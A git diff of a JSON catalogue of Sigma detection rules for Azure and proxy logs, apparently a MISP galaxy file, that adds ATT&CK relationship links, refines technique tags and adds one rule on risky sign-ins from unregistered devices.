"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0b4b72e3-4c53-4d5b-b198-2c58cfef39a9", "value": "Guest User Invited By Non Approved Inviters" }, @@ -55983,6 +72348,15 @@ "attack.t1552.001" ] }, + "related": [ + { + "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "459a2970-bb84-4e6a-a32e-ff0fbd99448d", "value": "Azure Key Vault Modified or Deleted" }, @@ -56101,9 +72475,20 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml" ], "tags": [ - "attack.impact" + "attack.impact", + "attack.defense_evasion", + "attack.t1562.004" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "025c9fe7-db72-49f9-af0d-31341dd7dd57", "value": "Azure Firewall Rule Collection Modified or Deleted" }, @@ -56132,6 +72517,22 @@ "attack.t1552.007" ] }, + "related": [ + { + "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f8ef3a62-3f44-40a4-abca-761ab235c436", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a61a3c56-4ce2-4351-a079-88ae4cbd2b58", "value": "Azure Kubernetes Admission Controller" }, @@ -56155,6 +72556,15 @@ "attack.t1003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c1182e02-49a3-481c-b3de-0fadc4091488", "value": "Rare Subscription-level Operations In Azure" }, @@ -56229,6 +72639,15 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "74298991-9fc4-460e-a92e-511aa60baec1", "value": "Added Owner To Application" }, @@ -56301,6 +72720,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "91c95675-1f27-46d0-bead-d1ae96b97cd3", "value": "User Added To Group With CA Policy Modification Access" }, @@ -56343,7 +72771,6 @@ "logsource.product": "azure", "refs": [ "https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes", - "https://attack.mitre.org/techniques/T1078", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_federation_modified.yml" ], "tags": [ @@ -56448,6 +72875,15 @@ "attack.persistence" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cbb67ecc-fb70-4467-9350-c910bdf7c628", "value": "Added Credentials to Existing Application" }, @@ -56470,9 +72906,27 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_device_or_configuration_modified_or_deleted.yml" ], "tags": [ - "attack.impact" + "attack.impact", + "attack.t1485", + "attack.t1565.001" ] }, + "related": [ + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "46530378-f9db-4af9-a9e5-889c177d3881", "value": "Azure Device or Configuration Modified or Deleted" }, @@ -56495,9 +72949,20 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_deleted.yml" ], "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.impact", + "attack.t1489" ] }, + "related": [ + { + "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "410d2a41-1e6d-452f-85e5-abdd8257a823", "value": "Azure Application Deleted" }, @@ -56546,9 +73011,18 @@ ], "tags": [ "attack.initial_access", - "attack.t1078" + "attack.t1078.004" ] }, + "related": [ + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "09438caa-07b1-4870-8405-1dbafe3dad95", "value": "Azure Subscription Permission Elevation Via ActivityLogs" }, @@ -56590,11 +73064,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml" ], "tags": [ @@ -56625,6 +73099,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "102e11e3-2db5-4c9e-bc26-357d42585d21", "value": "Bulk Deletion Changes To Privileged Account Permissions" }, @@ -56673,6 +73156,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "49a268a4-72f4-4e38-8a7b-885be690c5b5", "value": "User Added To Privilege Role" }, @@ -56693,9 +73185,19 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_creating_number_of_resources_detection.yml" ], "tags": [ + "attack.persistence", "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d2d901db-7a75-45a1-bc39-0cbf00812192", "value": "Number Of Resource Creation Or Deployment Activities" }, @@ -56788,9 +73290,20 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml" ], "tags": [ - "attack.impact" + "attack.impact", + "attack.defense_evasion", + "attack.t1562.007" ] }, + "related": [ + { + "dest-uuid": "77532a55-c283-4cd2-bc5d-2d0b65e9d88c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "83c17918-746e-4bd9-920b-8e098bf88c23", "value": "Azure Network Firewall Policy Modified or Deleted" }, @@ -56864,6 +73377,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "72af37e2-ec32-47dc-992b-bc288a2708cb", "value": "Azure New CloudShell Created" }, @@ -56937,6 +73459,15 @@ "attack.t1548" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "26e7c5e2-6545-481e-b7e6-050143459635", "value": "CA Policy Removed by Non Approved Actor" }, @@ -56961,6 +73492,15 @@ "attack.t1578.003" ] }, + "related": [ + { + "dest-uuid": "70857657-bd0b-4695-ad3e-b13f92cac1b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "48739819-8230-4ee3-a8ea-e0289d1fb0ff", "value": "Azure Active Directory Hybrid Health AD FS Service Delete" }, @@ -57034,6 +73574,15 @@ "attack.t1548" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0922467f-db53-4348-b7bf-dee8d0d348c6", "value": "New CA Policy by Non-approved Actor" }, @@ -57059,6 +73608,22 @@ "attack.t1526" ] }, + "related": [ + { + "dest-uuid": "8f104855-e5b7-4077-b1f5-bc3103b41abe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e24fcba8-2557-4442-a139-1ee2f2e784db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "35b781cc-1a08-4a5a-80af-42fd7c315c6b", "value": "Discovery Using AzureHound" }, @@ -57084,6 +73649,15 @@ "attack.t1548" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "50a3c7aa-ec29-44a4-92c1-fce229eef6fc", "value": "CA Policy Updated by Non Approved Actor" }, @@ -57130,9 +73704,18 @@ "tags": [ "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1078" + "attack.t1078.004" ] }, + "related": [ + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "db6c06c4-bf3b-421c-aa88-15672b88c743", "value": "Changes To PIM Settings" }, @@ -57181,6 +73764,15 @@ "attack.t1578" ] }, + "related": [ + { + "dest-uuid": "144e007b-e638-431d-a894-45d90c54ab90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "288a39fc-4914-4831-9ada-270e9dc12cb4", "value": "Azure Active Directory Hybrid Health AD FS New Server" }, @@ -57229,6 +73821,15 @@ "attack.t1078.004" ] }, + "related": [ + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5496ff55-42ec-4369-81cb-00f417029e25", "value": "Multifactor Authentication Interrupted" }, @@ -57249,9 +73850,19 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_guest_to_member.yml" ], "tags": [ - "attack.t1078" + "attack.privilege_escalation", + "attack.t1078.004" ] }, + "related": [ + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8dee7a0d-43fd-4b3c-8cd1-605e189d195e", "value": "User State Changed From Guest To Member" }, @@ -57301,6 +73912,15 @@ "attack.t1078.004" ] }, + "related": [ + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e40f4962-b02b-4192-9bfe-245f7ece1f99", "value": "Multifactor Authentication Denied" }, @@ -57325,6 +73945,15 @@ "attack.t1484" ] }, + "related": [ + { + "dest-uuid": "ebb42bbe-62d7-47d7-a55f-3b08b61d792d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aeaef14c-e5bf-4690-a9c8-835caad458bd", "value": "PIM Alert Setting Changes To Disabled" }, @@ -57345,9 +73974,19 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_granting_permission_detection.yml" ], "tags": [ - "attack.t1098" + "attack.persistence", + "attack.t1098.003" ] }, + "related": [ + { + "dest-uuid": "2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a622fcd2-4b5a-436a-b8a2-a4171161833c", "value": "Granting Of Permissions To An Account" }, @@ -57364,11 +74003,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml" ], "tags": [ @@ -57400,6 +74039,15 @@ "attack.credential_access" ] }, + "related": [ + { + "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0055ad1f-be85-4798-83cf-a6da17c993b3", "value": "Application URI Configuration Changes" }, @@ -57417,11 +74065,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_role_access.yml" ], "tags": [ @@ -57456,6 +74104,15 @@ "attack.t1552.001" ] }, + "related": [ + { + "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "80eeab92-0979-4152-942d-96749e11df40", "value": "Azure Keyvault Key Modified or Deleted" }, @@ -57528,6 +74185,15 @@ "attack.credential_access" ] }, + "related": [ + { + "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1b45b0d1-773f-4f23-aedc-814b759563b1", "value": "Application AppID Uri Configuration Changes" }, @@ -57545,11 +74211,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_container_registry_created_or_deleted.yml" ], "tags": [ @@ -57577,9 +74243,18 @@ ], "tags": [ "attack.initial_access", - "attack.t1078" + "attack.t1078.004" ] }, + "related": [ + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "908655e0-25cf-4ae1-b775-1c8ce9cf43d8", "value": "Login to Disabled Account" }, @@ -57606,6 +74281,15 @@ "attack.t1562.001" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "225d8b09-e714-479c-a0e4-55e6f29adf35", "value": "Azure Kubernetes Events Deleted" }, @@ -57623,7 +74307,6 @@ "logsource.product": "azure", "refs": [ "https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/", - "https://attack.mitre.org/techniques/T1098/003/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml" ], "tags": [ @@ -57631,6 +74314,15 @@ "attack.t1098.003" ] }, + "related": [ + { + "dest-uuid": "2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ebbeb024-5b1d-4e16-9c0c-917f86c708a7", "value": "User Added to an Administrator's Azure AD Role" }, @@ -57648,18 +74340,28 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", "https://kubernetes.io/docs/concepts/workloads/controllers/job/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cronjob.yml" ], "tags": [ "attack.persistence", + "attack.t1053.003", "attack.privilege_escalation", "attack.execution" ] }, + "related": [ + { + "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1c71e254-6655-42c1-b2d6-5e4718d7fc0a", "value": "Azure Kubernetes CronJob" }, @@ -57724,11 +74426,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml" ], "tags": [ @@ -57803,12 +74505,47 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_modified_or_deleted.yml" ], "tags": [ - "attack.impact" + "attack.impact", + "attack.defense_evasion", + "attack.t1562.004" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "512cf937-ea9b-4332-939c-4c2c94baadcd", "value": "Azure Firewall Modified or Deleted" }, + { + "description": "Detects risky authencaition from a non AD registered device without MFA being required.", + "meta": { + "author": "Harjot Singh, '@cyb3rjy0t'", + "creation_date": "2023/01/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "572b12d4-9062-11ed-a1eb-0242ac120002", + "value": "Suspicious SignIns From A Non Registered Device" + }, { "description": "Identifies when DNS zone is modified or deleted.", "meta": { @@ -57827,9 +74564,19 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_dns_zone_modified_or_deleted.yml" ], "tags": [ - "attack.impact" + "attack.impact", + "attack.t1565.001" ] }, + "related": [ + { + "dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "af6925b0-8826-47f1-9324-337507a0babd", "value": "Azure DNS Zone Modified or Deleted" }, @@ -57879,6 +74626,15 @@ "attack.t1484" ] }, + "related": [ + { + "dest-uuid": "ebb42bbe-62d7-47d7-a55f-3b08b61d792d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9494bff8-959f-4440-bbce-fb87a208d517", "value": "Changes to Device Registration Policy" }, @@ -57899,9 +74655,18 @@ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_only_single_factor_auth_required.yml" ], "tags": [ - "attack.t1078" + "attack.t1078.004" ] }, + "related": [ + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "28eea407-28d7-4e42-b0be-575d5ba60b2c", "value": "Azure AD Only Single Factor Authentication Required" }, @@ -57948,9 +74713,18 @@ "tags": [ "attack.persistence", "attack.privilege_escalation", - "attack.t1078" + "attack.t1078.004" ] }, + "related": [ + { + "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f7b5b004-dece-46e4-a4a5-f6fd0e1c6947", "value": "Privileged Account Creation" }, @@ -57998,6 +74772,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "665e2d43-70dc-4ccc-9d27-026c9dd7ed9c", "value": "User Removed From Group With CA Policy Modification Access" }, @@ -58039,7 +74822,6 @@ "logsource.product": "azure", "refs": [ "https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates", - "https://attack.mitre.org/techniques/T1556/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_disabled.yml" ], "tags": [ @@ -58047,6 +74829,15 @@ "attack.t1556" ] }, + "related": [ + { + "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7ea78478-a4f9-42a6-9dcd-f861816122bf", "value": "Disabled MFA to Bypass Authentication Mechanisms" }, @@ -58174,6 +74965,15 @@ "attack.t1552.001" ] }, + "related": [ + { + "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b831353c-1971-477b-abb6-2828edc3bca1", "value": "Azure Keyvault Secrets Modified or Deleted" }, @@ -58191,11 +74991,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_network_policy_change.yml" ], "tags": [ @@ -58220,17 +75020,27 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml" ], "tags": [ - "attack.impact" + "attack.impact", + "attack.t1531" ] }, + "related": [ + { + "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "12d027c3-b48c-4d9d-8bb6-a732200034b2", "value": "Azure Kubernetes Service Account Modified or Deleted" }, @@ -58255,6 +75065,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6ec820f2-e963-4801-9127-d8b2dce4d31b", "value": "APT User Agent" }, @@ -58279,6 +75098,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "894a8613-cf12-48b3-8e57-9085f54aa0c3", "value": "Suspicious Base64 User Agent" }, @@ -58304,6 +75132,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b923f7d6-ac89-4a50-a71a-89fb846b4aa8", "value": "Empire UserAgent URI Combo" }, @@ -58320,8 +75157,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://twitter.com/jhencinski/status/1102695118455349248", "https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/", + "https://twitter.com/jhencinski/status/1102695118455349248", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml" ], "tags": [ @@ -58333,6 +75170,22 @@ "attack.s0190" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9eb68894-7476-4cd6-8752-23b51f5883a7", "value": "Bitsadmin to Uncommon TLD" }, @@ -58359,6 +75212,15 @@ "attack.g0010" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7857f021-007f-4928-8b2c-7aedbe64bb82", "value": "Turla ComRAT" }, @@ -58383,6 +75245,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fb502828-2db0-438e-93e6-801c7548686d", "value": "Chafer Malware URL Pattern" }, @@ -58399,9 +75270,9 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw", "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/", + "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_exchange_owassrf_poc_exploitation.yml" ], "tags": [ @@ -58409,6 +75280,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fdd7e904-7304-4616-a46a-e32f917c4be4", "value": "OWASSRF Exploitation Attempt Using Public POC - Proxy" }, @@ -58433,6 +75313,15 @@ "attack.t1071.001" ] 